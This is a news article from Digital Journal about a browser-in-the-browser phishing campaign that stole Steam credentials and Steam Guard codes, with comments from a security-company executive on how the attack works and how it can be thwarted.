Connect with us

Hi, what are you looking for?

Tech & Science

PC platform caught out in browser-in-the-browser phishing attack

Not so much ‘full steam ahead’, for content site Steam has been caught out in a phishing attack.

Photo by Joshua Woroniecki, <a href="https://unsplash.com/s/photos/laptop?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Unsplash</a>
Photo by Joshua Woroniecki, Unsplash

Steam, the PC gaming platform, has been compromised in a browser-in-the-browser phishing attack that allowed threat actors to access users’ accounts and credentials. This form of attack simulates a login window with a spoofed domain within a parent browser window to steal credentials.

The phishing technique seeks to exploit the Single Sign-On authentication model to trick the user into coughing up sensitive information, chiefly their login credentials.

With Steam, analysts at Group-IB found that in order to lure in victims, the malicious attackers asked them to log into Steam to “join a team for a LoL, CS, Dota 2, or PUBG tournament, to vote for [their] favorite team, to buy discounted tickets to cybersport events, and more”. In other words, users were lured in.

Once Steam credentials are entered, the site proceeds to request a Steam Guard authentication code. After this is entered, the details are gathered and attackers log into their victim’s Steam account and take control of it.

Looking into the matter for Digital Journal is Alon Levin, VP of Product Management at Seraphic Security.

Levin begins by considering the nature of the attack, noting: “Unfortunately, this approach is rising in popularity among threat actors looking to create fake login forms and sell access to accounts.”

The attack method creates fake browser windows within the active window, making it appear as a sign-in pop-up page for a targeted login service.

With the specific incident, Levin continues: “In this case, displaying fake browser windows and login forms has allowed this attack method to access the accounts and credentials of Microsoft and Google users.”

When the computer user proceeds to access Steam, Levin explains: “Visitors are requested to log in and are then redirected to a fake window, where credentials are stolen after being entered by the user.

Moving on to consider the attack method more fully, Levin finds: “Although Browser-in-the-Browser attacks are becoming a more common tactic with cybercriminals, Internet users can mitigate these threats by leveraging comprehensive browser security.”

So how might such attacks be thwarted? Levin explains: “Though users can easily mistake such sites as the one targeted in this phishing attempt for being legitimate, a system that is based on execution flow analysis can thwart these attacks easily.”

Levin adds: “Systems based on execution flow analysis can thwart these attacks, maintain session integrity and prevent other types of phishing and social engineering attacks.”

Avatar photo
Written By

Dr. Tim Sandle is Digital Journal's Editor-at-Large for science news. Tim specializes in science, technology, environmental, business, and health journalism. He is additionally a practising microbiologist; and an author. He is also interested in history, politics and current affairs.

You may also like:

Business

The latest negotiations over European Union tariffs on Chinese electric vehicles ended in Brussels with "major differences" remaining.

Social Media

TikTok teams identified harmful effects of its platform on young users but limited preventive measures so as to avoid a drop in traffic.

Entertainment

Broadway performer Chilina Kennedy ("Beautiful") chatted about being a part of "The Great Gatsby" and her new album "Wild About You."

Social Media

You can’t just tell kids not to use screens. Screens are unavoidable. Stress can be avoided.